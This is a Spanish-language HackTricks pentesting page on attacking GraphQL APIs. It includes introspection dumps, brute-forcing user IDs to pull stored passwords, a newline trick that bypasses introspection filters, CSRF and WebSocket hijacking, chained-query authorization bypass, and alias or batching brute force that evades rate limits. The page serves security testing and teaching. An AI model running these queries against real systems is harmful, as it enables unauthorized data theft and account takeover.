GraphQL

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

IntroducciĆ³n

GraphQL se destaca como una alternativa eficiente a la API REST, ofreciendo un enfoque simplificado para consultar datos desde el backend. A diferencia de REST, que a menudo requiere numerosas solicitudes a travĆ©s de diversos endpoints para recopilar datos, GraphQL permite obtener toda la informaciĆ³n necesaria a travĆ©s de una solicitud Ćŗnica. Esta simplificaciĆ³n beneficia significativamente a los desarrolladores al disminuir la complejidad de sus procesos de obtenciĆ³n de datos.

GraphQL y Seguridad

Con la llegada de nuevas tecnologĆ­as, incluido GraphQL, tambiĆ©n surgen nuevas vulnerabilidades de seguridad. Un punto clave a tener en cuenta es que GraphQL no incluye mecanismos de autenticaciĆ³n por defecto. Es responsabilidad de los desarrolladores implementar tales medidas de seguridad. Sin una autenticaciĆ³n adecuada, los endpoints de GraphQL pueden exponer informaciĆ³n sensible a usuarios no autenticados, lo que representa un riesgo de seguridad significativo.

Ataques de Fuerza Bruta en Directorios y GraphQL

Para identificar instancias de GraphQL expuestas, se recomienda la inclusiĆ³n de rutas especĆ­ficas en ataques de fuerza bruta en directorios. Estas rutas son:

  • /graphql

  • /graphiql

  • /graphql.php

  • /graphql/console

  • /api

  • /api/graphql

  • /graphql/api

  • /graphql/graphql

Identificar instancias de GraphQL abiertas permite examinar las consultas admitidas. Esto es crucial para entender los datos accesibles a travĆ©s del endpoint. El sistema de introspecciĆ³n de GraphQL facilita esto al detallar las consultas que un esquema admite. Para mĆ”s informaciĆ³n sobre esto, consulta la documentaciĆ³n de GraphQL sobre introspecciĆ³n: GraphQL: Un lenguaje de consulta para APIs.

Huella Digital

La herramienta graphw00f es capaz de detectar quĆ© motor de GraphQL se utiliza en un servidor y luego imprime informaciĆ³n Ćŗtil para el auditor de seguridad.

Consultas Universales

Para verificar si una URL es un servicio de GraphQL, se puede enviar una consulta universal, query{__typename}. Si la respuesta incluye {"data": {"__typename": "Query"}}, confirma que la URL alberga un endpoint de GraphQL. Este mƩtodo se basa en el campo __typename de GraphQL, que revela el tipo del objeto consultado.

query{__typename}

EnumeraciĆ³n BĆ”sica

Graphql generalmente soporta GET, POST (x-www-form-urlencoded) y POST(json). Aunque por razones de seguridad, se recomienda permitir solo json para prevenir ataques CSRF.

IntrospecciĆ³n

Para usar la introspecciĆ³n y descubrir informaciĆ³n del esquema, consulta el campo __schema. Este campo estĆ” disponible en el tipo raĆ­z de todas las consultas.

query={__schema{types{name,fields{name}}}}

Con esta consulta encontrarƔs el nombre de todos los tipos que se estƔn utilizando:

query={__schema{types{name,fields{name,args{name,description,type{name,kind,ofType{name, kind}}}}}}}

Con esta consulta puedes extraer todos los tipos, sus campos y sus argumentos (y el tipo de los args). Esto serĆ” muy Ćŗtil para saber cĆ³mo consultar la base de datos.

Errores

Es interesante saber si los errores se van a mostrar ya que contribuirĆ”n con informaciĆ³n Ćŗtil.

?query={__schema}
?query={}
?query={thisdefinitelydoesnotexist}

Enumerar el esquema de la base de datos a travĆ©s de la introspecciĆ³n

Si la introspecciĆ³n estĆ” habilitada pero la consulta anterior no se ejecuta, intenta eliminar las directivas onOperation, onFragment y onField de la estructura de la consulta.

#Full introspection query

query IntrospectionQuery {
__schema {
queryType {
name
}
mutationType {
name
}
subscriptionType {
name
}
types {
...FullType
}
directives {
name
description
args {
...InputValue
}
onOperation  #Often needs to be deleted to run query
onFragment   #Often needs to be deleted to run query
onField      #Often needs to be deleted to run query
}
}
}

fragment FullType on __Type {
kind
name
description
fields(includeDeprecated: true) {
name
description
args {
...InputValue
}
type {
...TypeRef
}
isDeprecated
deprecationReason
}
inputFields {
...InputValue
}
interfaces {
...TypeRef
}
enumValues(includeDeprecated: true) {
name
description
isDeprecated
deprecationReason
}
possibleTypes {
...TypeRef
}
}

fragment InputValue on __InputValue {
name
description
type {
...TypeRef
}
defaultValue
}

fragment TypeRef on __Type {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
}
}
}
}

Consulta de introspecciĆ³n en lĆ­nea:

/?query=fragment%20FullType%20on%20Type%20{+%20%20kind+%20%20name+%20%20description+%20%20fields%20{+%20%20%20%20name+%20%20%20%20description+%20%20%20%20args%20{+%20%20%20%20%20%20...InputValue+%20%20%20%20}+%20%20%20%20type%20{+%20%20%20%20%20%20...TypeRef+%20%20%20%20}+%20%20}+%20%20inputFields%20{+%20%20%20%20...InputValue+%20%20}+%20%20interfaces%20{+%20%20%20%20...TypeRef+%20%20}+%20%20enumValues%20{+%20%20%20%20name+%20%20%20%20description+%20%20}+%20%20possibleTypes%20{+%20%20%20%20...TypeRef+%20%20}+}++fragment%20InputValue%20on%20InputValue%20{+%20%20name+%20%20description+%20%20type%20{+%20%20%20%20...TypeRef+%20%20}+%20%20defaultValue+}++fragment%20TypeRef%20on%20Type%20{+%20%20kind+%20%20name+%20%20ofType%20{+%20%20%20%20kind+%20%20%20%20name+%20%20%20%20ofType%20{+%20%20%20%20%20%20kind+%20%20%20%20%20%20name+%20%20%20%20%20%20ofType%20{+%20%20%20%20%20%20%20%20kind+%20%20%20%20%20%20%20%20name+%20%20%20%20%20%20%20%20ofType%20{+%20%20%20%20%20%20%20%20%20%20kind+%20%20%20%20%20%20%20%20%20%20name+%20%20%20%20%20%20%20%20%20%20ofType%20{+%20%20%20%20%20%20%20%20%20%20%20%20kind+%20%20%20%20%20%20%20%20%20%20%20%20name+%20%20%20%20%20%20%20%20%20%20%20%20ofType%20{+%20%20%20%20%20%20%20%20%20%20%20%20%20%20kind+%20%20%20%20%20%20%20%20%20%20%20%20%20%20name+%20%20%20%20%20%20%20%20%20%20%20%20%20%20ofType%20{+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20kind+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20name+%20%20%20%20%20%20%20%20%20%20%20%20%20%20}+%20%20%20%20%20%20%20%20%20%20%20%20}+%20%20%20%20%20%20%20%20%20%20}+%20%20%20%20%20%20%20%20}+%20%20%20%20%20%20}+%20%20%20%20}+%20%20}+}++query%20IntrospectionQuery%20{+%20%20schema%20{+%20%20%20%20queryType%20{+%20%20%20%20%20%20name+%20%20%20%20}+%20%20%20%20mutationType%20{+%20%20%20%20%20%20name+%20%20%20%20}+%20%20%20%20types%20{+%20%20%20%20%20%20...FullType+%20%20%20%20}+%20%20%20%20directives%20{+%20%20%20%20%20%20name+%20%20%20%20%20%20description+%20%20%20%20%20%20locations+%20%20%20%20%20%20args%20{+%20%20%20%20%20%20%20%20...InputValue+%20%20%20%20%20%20}+%20%20%20%20}+%20%20}+}

La Ćŗltima lĆ­nea de cĆ³digo es una consulta graphql que volcarĆ” toda la meta-informaciĆ³n del graphql (nombres de objetos, parĆ”metros, tipos...)

Si la introspecciĆ³n estĆ” habilitada, puedes usar GraphQL Voyager para ver en una GUI todas las opciones.

Consultando

Ahora que sabemos quĆ© tipo de informaciĆ³n se guarda dentro de la base de datos, intentemos extraer algunos valores.

En la introspecciĆ³n puedes encontrar quĆ© objeto puedes consultar directamente (porque no puedes consultar un objeto solo porque existe). En la imagen siguiente puedes ver que el "queryType" se llama "Query" y que uno de los campos del objeto "Query" es "flags", que tambiĆ©n es un tipo de objeto. Por lo tanto, puedes consultar el objeto flag.

Ten en cuenta que el tipo de la consulta "flags" es "Flags", y este objeto se define como se muestra a continuaciĆ³n:

Puedes ver que los objetos "Flags" estƔn compuestos por name y value. Luego puedes obtener todos los nombres y valores de las flags con la consulta:

query={flags{name, value}}

Ten en cuenta que en caso de que el objeto a consultar sea un tipo primitivo como string como en el siguiente ejemplo

Puedes simplemente consultarlo con:

query={hiddenFlags}

En otro ejemplo donde habĆ­a 2 objetos dentro del objeto de tipo "Query": "user" y "users". Si estos objetos no necesitan ningĆŗn argumento para buscar, podrĆ­a recuperar toda la informaciĆ³n de ellos solo pidiendo los datos que desea. En este ejemplo de Internet podrĆ­a extraer los nombres de usuario y contraseƱas guardados:

Sin embargo, en este ejemplo, si intentas hacerlo, obtienes este error:

Parece que de alguna manera buscarĆ” utilizando el argumento "uid" de tipo Int. De todos modos, ya sabĆ­amos que, en la secciĆ³n de EnumeraciĆ³n BĆ”sica, se propuso una consulta que nos mostraba toda la informaciĆ³n necesaria: query={__schema{types{name,fields{name, args{name,description,type{name, kind, ofType{name, kind}}}}}}}

Si lees la imagen proporcionada cuando ejecuto esa consulta, verƔs que "user" tenƭa el arg "uid" de tipo Int.

AsĆ­ que, realizando un ligero uid bruteforce, descubrĆ­ que en uid=1 se recuperĆ³ un nombre de usuario y una contraseƱa: query={user(uid:1){user,password}}

Nota que descubrƭ que podƭa pedir los parƔmetros "user" y "password" porque si intento buscar algo que no existe (query={user(uid:1){noExists}}) obtengo este error:

Y durante la fase de enumeraciĆ³n descubrĆ­ que el objeto "dbuser" tenĆ­a como campos "user" y "password.

Truco de volcado de cadena de consulta (gracias a @BinaryShadow_)

Si puedes buscar por un tipo de cadena, como: query={theusers(description: ""){username,password}} y buscas una cadena vacĆ­a, volcarĆ” todos los datos. (Nota que este ejemplo no estĆ” relacionado con el ejemplo de los tutoriales, para este ejemplo supĆ³n que puedes buscar usando "theusers" por un campo de cadena llamado "description").

BĆŗsqueda

En esta configuraciĆ³n, una base de datos contiene personas y pelĆ­culas. Las personas se identifican por su correo electrĆ³nico y nombre; las pelĆ­culas por su nombre y calificaciĆ³n. Las personas pueden ser amigas entre sĆ­ y tambiĆ©n tener pelĆ­culas, indicando relaciones dentro de la base de datos.

Puedes buscar personas por el nombre y obtener sus correos electrĆ³nicos:

{
searchPerson(name: "John Doe") {
email
}
}

Puedes buscar personas por el nombre y obtener sus pelĆ­culas suscritas:

{
searchPerson(name: "John Doe") {
email
subscribedMovies {
edges {
node {
name
}
}
}
}
}

Nota cĆ³mo se indica recuperar el name de los subscribedMovies de la persona.

TambiĆ©n puedes buscar varios objetos al mismo tiempo. En este caso, se realiza una bĆŗsqueda de 2 pelĆ­culas:

{
searchPerson(subscribedMovies: [{name: "Inception"}, {name: "Rocky"}]) {
name
}
}r

O incluso relaciones de varios objetos diferentes utilizando alias:

{
johnsMovieList: searchPerson(name: "John Doe") {
subscribedMovies {
edges {
node {
name
}
}
}
}
davidsMovieList: searchPerson(name: "David Smith") {
subscribedMovies {
edges {
node {
name
}
}
}
}
}

Mutaciones

Las mutaciones se utilizan para realizar cambios en el lado del servidor.

En la introspecciĆ³n puedes encontrar las mutaciones declaradas. En la siguiente imagen, el "MutationType" se llama "Mutation" y el objeto "Mutation" contiene los nombres de las mutaciones (como "addPerson" en este caso):

En esta configuraciĆ³n, una base de datos contiene personas y pelĆ­culas. Las personas se identifican por su correo electrĆ³nico y nombre; las pelĆ­culas por su nombre y calificaciĆ³n. Las personas pueden ser amigas entre sĆ­ y tambiĆ©n tener pelĆ­culas, indicando relaciones dentro de la base de datos.

Una mutaciĆ³n para crear nuevas pelĆ­culas dentro de la base de datos puede ser como la siguiente (en este ejemplo, la mutaciĆ³n se llama addMovie):

mutation {
addMovie(name: "Jumanji: The Next Level", rating: "6.8/10", releaseYear: 2019) {
movies {
name
rating
}
}
}

Nota cĆ³mo tanto los valores como el tipo de datos se indican en la consulta.

AdemĆ”s, la base de datos admite una operaciĆ³n de mutaciĆ³n, llamada addPerson, que permite la creaciĆ³n de personas junto con sus asociaciones a amigos y pelĆ­culas existentes. Es crucial notar que los amigos y las pelĆ­culas deben preexistir en la base de datos antes de vincularlos a la persona reciĆ©n creada.

mutation {
addPerson(name: "James Yoe", email: "jy@example.com", friends: [{name: "John Doe"}, {email: "jd@example.com"}], subscribedMovies: [{name: "Rocky"}, {name: "Interstellar"}, {name: "Harry Potter and the Sorcerer's Stone"}]) {
person {
name
email
friends {
edges {
node {
name
email
}
}
}
subscribedMovies {
edges {
node {
name
rating
releaseYear
}
}
}
}
}
}

Sobrecarga de Directivas

Como se explicĆ³ en una de las vulnerabilidades descritas en este informe, una sobrecarga de directivas implica llamar a una directiva incluso millones de veces para hacer que el servidor desperdicie operaciones hasta que sea posible hacer un DoS.

AgrupaciĆ³n de fuerza bruta en 1 solicitud API

Esta informaciĆ³n fue tomada de https://lab.wallarm.com/graphql-batching-attack/. AutenticaciĆ³n a travĆ©s de la API de GraphQL con el envĆ­o simultĆ”neo de muchas consultas con diferentes credenciales para verificarlo. Es un ataque clĆ”sico de fuerza bruta, pero ahora es posible enviar mĆ”s de un par de inicio de sesiĆ³n/contraseƱa por solicitud HTTP debido a la funciĆ³n de agrupaciĆ³n de GraphQL. Este enfoque engaƱarĆ­a a las aplicaciones externas de monitoreo de tasas haciĆ©ndoles pensar que todo estĆ” bien y que no hay un bot de fuerza bruta intentando adivinar contraseƱas.

A continuaciĆ³n, puedes encontrar la demostraciĆ³n mĆ”s simple de una solicitud de autenticaciĆ³n de aplicaciĆ³n, con 3 pares de correo electrĆ³nico/contraseƱa diferentes a la vez. Obviamente, es posible enviar miles en una sola solicitud de la misma manera:

Como podemos ver en la captura de pantalla de la respuesta, la primera y la tercera solicitudes devolvieron null y reflejaron la informaciĆ³n correspondiente en la secciĆ³n de error. La segunda mutaciĆ³n tenĆ­a los datos de autenticaciĆ³n correctos y la respuesta tiene el token de sesiĆ³n de autenticaciĆ³n correcto.

GraphQL Sin IntrospecciĆ³n

Cada vez mĆ”s puntos finales de graphql estĆ”n deshabilitando la introspecciĆ³n. Sin embargo, los errores que graphql lanza cuando se recibe una solicitud inesperada son suficientes para que herramientas como clairvoyance recrean la mayor parte del esquema.

AdemĆ”s, la extensiĆ³n de Burp Suite GraphQuail observa las solicitudes de API de GraphQL que pasan a travĆ©s de Burp y construye un esquema interno de GraphQL con cada nueva consulta que ve. TambiĆ©n puede exponer el esquema para GraphiQL y Voyager. La extensiĆ³n devuelve una respuesta falsa cuando recibe una consulta de introspecciĆ³n. Como resultado, GraphQuail muestra todas las consultas, argumentos y campos disponibles para su uso dentro de la API. Para mĆ”s informaciĆ³n verifica esto.

Una buena lista de palabras para descubrir entidades de GraphQL se puede encontrar aquĆ­.

Eludir las defensas de introspecciĆ³n de GraphQL

Para eludir las restricciones en las consultas de introspecciĆ³n en las API, insertar un carĆ”cter especial despuĆ©s de la palabra clave __schema resulta efectivo. Este mĆ©todo explota descuidos comunes de los desarrolladores en patrones de regex que intentan bloquear la introspecciĆ³n al centrarse en la palabra clave __schema. Al agregar caracteres como espacios, nuevas lĆ­neas y comas, que GraphQL ignora pero que podrĆ­an no ser considerados en regex, se pueden eludir las restricciones. Por ejemplo, una consulta de introspecciĆ³n con una nueva lĆ­nea despuĆ©s de __schema puede eludir tales defensas:

# Example with newline to bypass
{
"query": "query{__schema
{queryType{name}}}"
}

Si no tiene Ʃxito, considere mƩtodos de solicitud alternativos, como solicitudes GET o POST con x-www-form-urlencoded, ya que las restricciones pueden aplicarse solo a las solicitudes POST.

Intente WebSockets

Como se mencionĆ³ en esta charla, verifique si podrĆ­a ser posible conectarse a graphQL a travĆ©s de WebSockets, ya que eso podrĆ­a permitirle eludir un posible WAF y hacer que la comunicaciĆ³n de WebSocket filtre el esquema de graphQL:

ws = new WebSocket('wss://target/graphql', 'graphql-ws');
ws.onopen = function start(event) {
var GQL_CALL = {
extensions: {},
query: `
{
__schema {
_types {
name
}
}
}`
}

var graphqlMsg = {
type: 'GQL.START',
id: '1',
payload: GQL_CALL,
};
ws.send(JSON.stringify(graphqlMsg));
}

Descubriendo Estructuras GraphQL Expuestas

Cuando la introspecciĆ³n estĆ” deshabilitada, examinar el cĆ³digo fuente del sitio web en busca de consultas precargadas en bibliotecas de JavaScript es una estrategia Ćŗtil. Estas consultas se pueden encontrar utilizando la pestaƱa Sources en las herramientas de desarrollo, proporcionando informaciĆ³n sobre el esquema de la API y revelando potencialmente consultas sensibles expuestas. Los comandos para buscar dentro de las herramientas de desarrollo son:

Inspect/Sources/"Search all files"
file:* mutation
file:* query

CSRF en GraphQL

Si no sabes quƩ es CSRF, lee la siguiente pƔgina:

CSRF (Cross Site Request Forgery)

Allƭ podrƔs encontrar varios endpoints de GraphQL configurados sin tokens CSRF.

Ten en cuenta que las solicitudes de GraphQL generalmente se envƭan a travƩs de solicitudes POST utilizando el Content-Type application/json.

{"operationName":null,"variables":{},"query":"{\n  user {\n    firstName\n    __typename\n  }\n}\n"}

Sin embargo, la mayorƭa de los endpoints de GraphQL tambiƩn soportan form-urlencoded solicitudes POST:

query=%7B%0A++user+%7B%0A++++firstName%0A++++__typename%0A++%7D%0A%7D%0A

Por lo tanto, dado que las solicitudes CSRF como las anteriores se envĆ­an sin solicitudes de preflight, es posible realizar cambios en el GraphQL abusando de un CSRF.

Sin embargo, tenga en cuenta que el nuevo valor predeterminado de la cookie de la bandera samesite de Chrome es Lax. Esto significa que la cookie solo se enviarĆ” desde un sitio web de terceros en solicitudes GET.

Tenga en cuenta que generalmente es posible enviar la solicitud de consulta tambiƩn como una solicitud GET y el token CSRF podrƭa no estar siendo validado en una solicitud GET.

AdemƔs, abusando de un XS-Search ataque podrƭa ser posible exfiltrar contenido del punto final de GraphQL abusando de las credenciales del usuario.

Para mĆ”s informaciĆ³n verifique el post original aquĆ­.

Secuestro de WebSocket entre sitios en GraphQL

Similar a las vulnerabilidades CRSF que abusan de graphQL, tambiĆ©n es posible realizar un secuestro de WebSocket entre sitios para abusar de una autenticaciĆ³n con GraphQL con cookies no protegidas y hacer que un usuario realice acciones inesperadas en GraphQL.

Para mĆ”s informaciĆ³n consulte:

WebSocket Attacks

AutorizaciĆ³n en GraphQL

Muchas funciones de GraphQL definidas en el punto final pueden solo verificar la autenticaciĆ³n del solicitante pero no la autorizaciĆ³n.

Modificar las variables de entrada de la consulta podrĆ­a llevar a detalles sensibles de la cuenta leaked.

La mutaciĆ³n podrĆ­a incluso llevar a la toma de control de la cuenta al intentar modificar otros datos de la cuenta.

{
"operationName":"updateProfile",
"variables":{"username":INJECT,"data":INJECT},
"query":"mutation updateProfile($username: String!,...){updateProfile(username: $username,...){...}}"
}

Bypass de autorizaciĆ³n en GraphQL

Encadenar consultas juntas puede eludir un sistema de autenticaciĆ³n dĆ©bil.

En el ejemplo a continuaciĆ³n, puedes ver que la operaciĆ³n es "forgotPassword" y que solo deberĆ­a ejecutar la consulta forgotPassword asociada. Esto se puede eludir agregando una consulta al final, en este caso agregamos "register" y una variable de usuario para que el sistema registre a un nuevo usuario.

Eludir lĆ­mites de tasa usando alias en GraphQL

En GraphQL, los alias son una caracterĆ­stica poderosa que permite la nominaciĆ³n de propiedades explĆ­citamente al hacer una solicitud de API. Esta capacidad es particularmente Ćŗtil para recuperar mĆŗltiples instancias del mismo tipo de objeto dentro de una sola solicitud. Los alias se pueden emplear para superar la limitaciĆ³n que impide que los objetos de GraphQL tengan mĆŗltiples propiedades con el mismo nombre.

Para una comprensiĆ³n detallada de los alias de GraphQL, se recomienda el siguiente recurso: Aliases.

Si bien el propĆ³sito principal de los alias es reducir la necesidad de numerosas llamadas a la API, se ha identificado un caso de uso no intencionado donde los alias pueden ser aprovechados para ejecutar ataques de fuerza bruta en un endpoint de GraphQL. Esto es posible porque algunos endpoints estĆ”n protegidos por limitadores de tasa diseƱados para frustrar ataques de fuerza bruta al restringir el nĆŗmero de solicitudes HTTP. Sin embargo, estos limitadores de tasa pueden no tener en cuenta el nĆŗmero de operaciones dentro de cada solicitud. Dado que los alias permiten la inclusiĆ³n de mĆŗltiples consultas en una sola solicitud HTTP, pueden eludir tales medidas de limitaciĆ³n de tasa.

Considera el ejemplo proporcionado a continuaciĆ³n, que ilustra cĆ³mo se pueden usar consultas con alias para verificar la validez de los cĆ³digos de descuento de la tienda. Este mĆ©todo podrĆ­a eludir la limitaciĆ³n de tasa ya que compila varias consultas en una sola solicitud HTTP, lo que potencialmente permite la verificaciĆ³n de numerosos cĆ³digos de descuento simultĆ”neamente.

# Example of a request utilizing aliased queries to check for valid discount codes
query isValidDiscount($code: Int) {
isvalidDiscount(code:$code){
valid
}
isValidDiscount2:isValidDiscount(code:$code){
valid
}
isValidDiscount3:isValidDiscount(code:$code){
valid
}
}

Tools

Vulnerability scanners

Clients

Automatic Tests

References

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Last updated